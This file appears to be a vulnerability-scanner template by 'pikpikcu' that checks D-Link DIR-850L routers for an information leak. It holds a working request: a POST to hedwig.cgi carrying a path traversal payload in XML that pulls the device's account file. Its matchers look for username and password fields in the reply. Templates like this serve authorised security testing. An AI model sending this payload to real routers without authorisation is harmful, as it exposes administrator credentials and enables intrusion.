id: dlink-850L-info-leak

info:
  name: Dlink Dir-850L Info Leak
  author: pikpikcu
  severity: info
  reference: https://xz.aliyun.com/t/2941
  tags: dlink

requests:
  - method: POST
    path:
      - "{{BaseURL}}/hedwig.cgi"
    body: |
      <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
    headers:
      Cookie: uid=R8tBjwtFc8
      Content-Type: text/xml

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "</usrid>"
          - "</password>"
        part: body
